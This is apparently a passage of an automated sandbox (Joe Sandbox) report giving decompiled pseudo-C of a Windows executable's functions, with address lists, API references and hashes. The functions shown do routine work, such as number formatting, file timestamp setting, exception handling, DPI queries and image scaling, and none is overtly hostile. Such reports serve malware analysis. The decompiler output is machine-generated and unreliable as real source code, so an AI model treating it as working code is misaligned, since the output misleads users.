								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00E7EAD0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00E7EAD0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00E7EAD0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00E897F1(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00E91DF0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00E88C7A();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00E88B59();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00e894ee
0x00e894f9
0x00e89500
0x00e89502
0x00e89502
0x00e89504
0x00e8950d
0x00e8950f
0x00e89514
0x00e8951a
0x00e89530
0x00e89535
0x00e89538
0x00e89545
0x00e8954a
0x00e8959e
0x00e895a6
0x00e895a8
0x00e895aa
0x00e895ad
0x00e895ad
0x00e895ad
0x00e895b3
0x00e895bb
0x00e895ce
0x00e895d1
0x00e895d3
0x00e895d6
0x00e895d7
0x00e895f8
0x00e895fb
0x00e895fb
0x00e895d9
0x00e895d9
0x00e895db
0x00e895e6
0x00e895e6
0x00e895e8
0x00e895ef
0x00e895ea
0x00e895ea
0x00e895ea
0x00e895e8
0x00e895fc
0x00e895fe
0x00e895ff
0x00e89602
0x00e89604
0x00e89618
0x00e89606
0x00e89606
0x00e89606
0x00e8961d
0x00e8961d
0x00e89622
0x00e89625
0x00e89630
0x00e89630
0x00e89630
0x00e89630
0x00e89634
0x00e8963b
0x00e8963c
0x00e8963f
0x00e89642
0x00e89642
0x00e89644
0x00000000
0x00000000
0x00e8965c
0x00e89663
0x00e89667
0x00e8966a
0x00e8966d
0x00e8966f
0x00e8966f
0x00e8966f
0x00e89671
0x00e89674
0x00e89677
0x00e89679
0x00e89681
0x00e89687
0x00e8968a
0x00e8968d
0x00e8968e
0x00e89691
0x00e89694
0x00e89694
0x00e89699
0x00e8969c
0x00000000
0x00000000
0x00e896b4
0x00e896b9
0x00e896bd
0x00000000
0x00000000
0x00e896c1
0x00e896c1
0x00e896c4
0x00e896c5
0x00e896c5
0x00e896c7
0x00e896ca
0x00000000
0x00000000
0x00e896cc
0x00e896cf
0x00e896d6
0x00e896d9
0x00e896dc
0x00e896f2
0x00e896f2
0x00e896f2
0x00e896de
0x00e896de
0x00e896e0
0x00e896e3
0x00e896ee
0x00e896e5
0x00e896e8
0x00e896e8
0x00e896e3
0x00000000
0x00e896dc
0x00e896d1
0x00e896d1
0x00e896d3
0x00e896d3
0x00e89627
0x00e89627
0x00e8962a
0x00e896f5
0x00e896f5
0x00e896f7
0x00e896f9
0x00e896fc
0x00e896fd
0x00e896fe
0x00e896ff
0x00e89707
0x00e89707
0x00e89707
0x00e89709
0x00e8970c
0x00e8970f
0x00e89711
0x00e89711
0x00e89713
0x00e89725
0x00e89729
0x00e8972c
0x00e89733
0x00e8973b
0x00e8973b
0x00e8973e
0x00e89740
0x00e89751
0x00e89751
0x00e89755
0x00e89755
0x00e89758
0x00e8975a
0x00e8975d
0x00000000
0x00e89742
0x00e89742
0x00e89748
0x00e89748
0x00e8974c
0x00e8975f
0x00e8975f
0x00e89763
0x00e89764
0x00e89766
0x00e89768
0x00e897a9
0x00e897a9
0x00e897ab
0x00e897b8
0x00e897b8
0x00e897ba
0x00e897bc
0x00e897bd
0x00e897be
0x00e897c5
0x00e897c8
0x00e897ca
0x00e897ca
0x00e897cb
0x00e897cd
0x00e897d0
0x00e897d0
0x00e897d2
0x00e897d4
0x00000000
0x00e897d4
0x00e897ad
0x00e897af
0x00000000
0x00000000
0x00e897b1
0x00000000
0x00000000
0x00e897b3
0x00e897b6
0x00000000
0x00000000
0x00000000
0x00e897b6
0x00e8976f
0x00e89775
0x00e89775
0x00e89777
0x00e89778
0x00e89779
0x00e8977a
0x00e89781
0x00e89784
0x00e89786
0x00e89787
0x00e89789
0x00e89796
0x00e89796
0x00e89798
0x00e8979a
0x00e8979b
0x00e8979c
0x00e897a3
0x00e897a6
0x00e897a8
0x00e897a8
0x00000000
0x00e897a8
0x00e8978b
0x00e8978b
0x00e8978d
0x00000000
0x00000000
0x00e8978f
0x00000000
0x00000000
0x00e89791
0x00e89794
0x00000000
0x00000000
0x00000000
0x00e89794
0x00e89771
0x00e89773
0x00000000
0x00000000
0x00000000
0x00e89773
0x00e89744
0x00e89746
0x00000000
0x00000000
0x00000000
0x00e89746
0x00e89740
0x00000000
0x00e8962a
0x00e89625
0x00e8954c
0x00e8954e
0x00000000
0x00e89550
0x00e89566
0x00e8956b
0x00e8956d
0x00e89579
0x00e8957f
0x00e89580
0x00e89582
0x00e89584
0x00e8958f
0x00e8958f
0x00e89592
0x00e89594
0x00e89594
0x00e89597
0x00e8956f
0x00e8956f
0x00e8956f
0x00000000
0x00e8956d
0x00e8951c
0x00e8951c
0x00e89523
0x00e89524
0x00e89526
0x00e897d8
0x00e897dc
0x00e897e1
0x00e897e1
0x00e897f0
0x00e897f0

APIs

_strrchr.LIBCMT ref: 00E89579
__alldvrm.LIBCMT ref: 00E8977A
__alldvrm.LIBCMT ref: 00E8979C

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e530949d133c0fe719df7704e4bd8e68177ea7de6064a97516e7fd75facf1640
Instruction ID: fd21cfc9ac05dc0e998a0d703540d58a06d9a6ed7bbb065812a49a2bb20bb379
Opcode Fuzzy Hash: e530949d133c0fe719df7704e4bd8e68177ea7de6064a97516e7fd75facf1640
Instruction Fuzzy Hash: 67A15771D102869FEB12EF18C8917BEBBE5EF55314F1C41AAE48DAB282D2398941C750

Uniqueness

Uniqueness Score: -1.00%

Function 00E6A49E Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E6A49E(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00E7E630();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00E6A387( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00E6A637( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00E70EAD(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00E70EAD(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00E70EAD(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00E6A637( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00E6B85C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00e6a49e
0x00e6a4a3
0x00e6a4af
0x00e6a4b6
0x00e6a4ba
0x00e6a4c7
0x00e6a4c7
0x00e6a4cb
0x00e6a4cb
0x00e6a4d4
0x00e6a4e1
0x00e6a4e1
0x00e6a4e5
0x00e6a4e5
0x00e6a4ee
0x00e6a4fc
0x00e6a4fc
0x00e6a500
0x00e6a507
0x00e6a50c
0x00e6a513
0x00e6a529
0x00e6a519
0x00e6a522
0x00e6a522
0x00e6a544
0x00e6a54a
0x00e6a551
0x00e6a59b
0x00e6a5a0
0x00e6a5a9
0x00e6a5a9
0x00e6a5b3
0x00e6a5bc
0x00e6a5bc
0x00e6a5c6
0x00e6a5cf
0x00e6a5cf
0x00e6a5df
0x00e6a5e3
0x00e6a5f3
0x00e6a603
0x00e6a609
0x00e6a610
0x00e6a618
0x00e6a625
0x00e6a625
0x00000000
0x00e6a553
0x00e6a564
0x00e6a56b
0x00e6a62a
0x00e6a634
0x00e6a634
0x00e6a588
0x00e6a58e
0x00e6a595
0x00000000
0x00000000
0x00000000
0x00e6a595
0x00e6a551
0x00e6a4f6
0x00e6a4fa
0x00000000
0x00000000
0x00000000
0x00e6a4fa
0x00e6a4db
0x00e6a4df
0x00000000
0x00000000
0x00000000
0x00e6a4df
0x00e6a4c1
0x00e6a4c5
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00E6823A,?,?,?), ref: 00E6A544
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000000,?,00E6823A,?), ref: 00E6A588
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000000,?,00E6823A,?,?,?,?,?,?,?), ref: 00E6A609
CloseHandle.KERNEL32(?,?,?,00000000,?,00E6823A,?,?,?,?,?,?,?,?,?,?), ref: 00E6A610

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 3d262a605e90c21466b2c582ba4bb5826a790dc3cf65182f49202d24cca7fdfc
Instruction ID: 5d53507343427fa36eb4322147a762486b871e210496a99c42c00ba6e0f46eb1
Opcode Fuzzy Hash: 3d262a605e90c21466b2c582ba4bb5826a790dc3cf65182f49202d24cca7fdfc
Instruction Fuzzy Hash: B141F0316883819AD721DF24EC45BAFBBE4AB94344F08192DF5E6B3181C6649A4CDB53

Uniqueness

Uniqueness Score: -1.00%

Function 00E827A3 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E00E827A3(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00E82DF2(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00E7FEAB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00E82FF4(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00E825AD(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00E7FE79(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00e827a3
0x00e827a3
0x00e827a6
0x00e827ab
0x00e827ae
0x00e827b0
0x00e827b3
0x00e827b6
0x00e827b7
0x00e827ba
0x00e827bf
0x00e827bf
0x00e827c2
0x00e827c6
0x00e827c9
0x00e827ce
0x00e827cb
0x00e827cb
0x00e827cb
0x00e827d1
0x00e827d7
0x00e827da
0x00e827dc
0x00e827df
0x00e827e2
0x00e827e3
0x00e827ec
0x00e827f1
0x00e827f4
0x00e827fa
0x00e827fd
0x00e82800
0x00e82803
0x00e82804
0x00e82807
0x00e82812
0x00e82816
0x00000000
0x00e82816
0x00e8281d

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00E827BA

Part of subcall function 00E82DF2: ___AdjustPointer.LIBCMT ref: 00E82E3C

_UnwindNestedFrames.LIBCMT ref: 00E827D1
___FrameUnwindToState.LIBVCRUNTIME ref: 00E827E3
CallCatchBlock.LIBVCRUNTIME ref: 00E82807

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 3701000bff87a838d7b8a2685806fb3fae97cd61193cfd47920744a040a95360
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 0E01E532000149BBDF12AF65CC41EDA3BBAEF58754F159119FA1C76121C736E8A1EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A01B Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7A01B() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xea8428 = GetDeviceCaps(_t5, 0x58);
					 *0xea842c = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x00e7a01e
0x00e7a024
0x00e7a028
0x00e7a036
0x00e7a044
0x00000000
0x00e7a049
0x00e7a050

APIs

GetDC.USER32(00000000), ref: 00E7A01E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E7A02D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7A03B
ReleaseDC.USER32(00000000,00000000), ref: 00E7A049

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c4abd3d98098fca80b858d669669c4e488daba519be28473d5bdebf12a61250b
Instruction ID: 99ac457367f05ba094206372537720d3af367bf0543319bfce097c5f2fcf8f0f
Opcode Fuzzy Hash: c4abd3d98098fca80b858d669669c4e488daba519be28473d5bdebf12a61250b
Instruction Fuzzy Hash: 95E0EC31985621AFD3201BB26C0EF8F3B54BB0EB52F05402AF706B6190EA75440ACBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00E822B6 Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E822B6() {
				void* _t4;
				void* _t8;

				E00E83704();
				E00E83698();
				if(E00E833BE() != 0) {
					_t4 = E00E823FC(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00E833FA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00e822b6
0x00e822bb
0x00e822c7
0x00e822cc
0x00e822d1
0x00e822d3
0x00e822de
0x00e822d5
0x00e822d5
0x00000000
0x00e822d5
0x00e822c9
0x00e822c9
0x00e822cb
0x00e822cb

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00E822B6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00E822BB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00E822C0

Part of subcall function 00E833BE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00E833CF

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00E822D5

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 5bd959aa501a7ab12ea48519a29bdec622f540cb30e6334150180b8a95b84f40
Instruction ID: 5700e599a2751dd231a09fd6c7032dee675f75bd5c31643234378b5720acf7be
Opcode Fuzzy Hash: 5bd959aa501a7ab12ea48519a29bdec622f540cb30e6334150180b8a95b84f40
Instruction Fuzzy Hash: B4C04C78004202A41C207BB531171ED03C05C56FC878034C9FE5E375179D06060A2B37

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A1BD Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 241
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7A1BD(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				void* __edi;
				intOrPtr* _t89;
				void* _t91;
				intOrPtr* _t92;
				signed int _t95;
				intOrPtr* _t98;
				intOrPtr* _t101;
				short _t111;
				signed int _t114;
				intOrPtr* _t115;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t127;
				signed int _t130;
				intOrPtr* _t136;
				intOrPtr* _t140;
				void* _t145;
				signed int _t147;
				intOrPtr* _t153;
				intOrPtr* _t167;
				intOrPtr* _t170;
				char _t181;
				void* _t183;
				intOrPtr* _t187;
				signed int _t199;
				long long* _t203;
				long long _t206;

				_t206 = __fp0;
				if(E00E7A051() != 0) {
					_t145 = _a4;
					GetObjectW(_t145, 0x18,  &_v68);
					_t147 = _v4;
					asm("cdq");
					_t199 = _v72 * _t147 / _v76;
					if(_t199 >= _v0) {
						_t199 = _v0;
					}
					if(_t147 != _v76 || _t199 != _v72) {
						_t181 = 0;
						_push( &_v124);
						_push(0xe94684);
						_push(1);
						_push(0);
						_push(0xe9546c);
						if( *0xec2178() >= 0) {
							_t89 = _v144;
							 *0xe93260(_t89, _t145, 0, 2,  &_v140, _t183);
							_t91 =  *((intOrPtr*)( *_t89 + 0x54))();
							_t92 = _v164;
							if(_t91 < 0) {
								L14:
								 *0xe93260(_t92);
								 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))();
								L21:
								_t95 =  *0xec20e8(_t145, _t181, _t181, _t181, _t181);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t187 =  *((intOrPtr*)( *_t92 + 0x28));
							_t153 = _t187;
							 *0xe93260(_t92,  &_v156);
							if( *_t187() < 0) {
								L13:
								_t98 = _v168;
								 *0xe93260(_t98);
								 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
								_t92 = _v176;
								goto L14;
							}
							_t101 = _v164;
							asm("fldz");
							 *_t203 = _t206;
							 *0xe93260(_t101, _v168, 0xe9547c, 0, 0, _t153, _t153, 0);
							if( *((intOrPtr*)( *_t101 + 0x20))() >= 0) {
								E00E7F5F0(0,  &_v136, 0, 0x2c);
								_v132 = _v84;
								_v136 = 0x28;
								_v128 =  ~_t199;
								_v120 = 0;
								_v124 = 1;
								_t111 = 0x20;
								_v122 = _t111;
								_v184 = 0;
								_t114 =  *0xec205c(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t114;
								asm("sbb ecx, ecx");
								if(( ~_t114 & 0x7ff8fff2) + 0x8007000e >= 0) {
									_t167 = _v228;
									 *0xe93260(_t167,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x2c))))();
									_t127 = _v224;
									 *0xe93260(_t127, _v232, _v116, _t199, 3);
									 *((intOrPtr*)( *_t127 + 0x20))();
									_t130 = _v136;
									_t170 = _v244;
									_v216 = _t199;
									_v220 = _t130;
									_v228 = 0;
									_v224 = 0;
									 *0xe93260(_t170,  &_v228, _t130 << 2, _t199 * _t130 << 2, _v232);
									if( *((intOrPtr*)( *_t170 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t136 = _v268;
									 *0xe93260(_t136);
									 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 8))))();
								}
								_t115 = _v224;
								 *0xe93260(_t115);
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))();
								_t118 = _v224;
								 *0xe93260(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v236;
								 *0xe93260(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t95 = _v220;
								if(_t95 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t140 = _v196;
							 *0xe93260(_t140);
							 *((intOrPtr*)( *((intOrPtr*)( *_t140 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t181 = 0;
						L8:
						_t95 =  *0xec20e8(_t145, _t181, _t181, _t181, _t181);
						L23:
						return _t95;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00E7A476();
			}

0x00e7a1bd
0x00e7a1c7
0x00e7a1e0
0x00e7a1ed
0x00e7a1f7
0x00e7a201
0x00e7a206
0x00e7a20f
0x00e7a211
0x00e7a211
0x00e7a21d
0x00e7a22d
0x00e7a22f
0x00e7a230
0x00e7a238
0x00e7a239
0x00e7a23a
0x00e7a247
0x00e7a259
0x00e7a26d
0x00e7a273
0x00e7a278
0x00e7a27c
0x00e7a2f1
0x00e7a2f9
0x00e7a2ff
0x00e7a461
0x00e7a466
0x00e7a46c
0x00000000
0x00e7a46c
0x00e7a27e
0x00e7a28a
0x00e7a28d
0x00e7a28f
0x00e7a299
0x00e7a2d9
0x00e7a2d9
0x00e7a2e5
0x00e7a2eb
0x00e7a2ed
0x00000000
0x00e7a2ed
0x00e7a29b
0x00e7a29f
0x00e7a2a6
0x00e7a2b8
0x00e7a2c3
0x00e7a30e
0x00e7a31d
0x00e7a325
0x00e7a32d
0x00e7a336
0x00e7a33a
0x00e7a33f
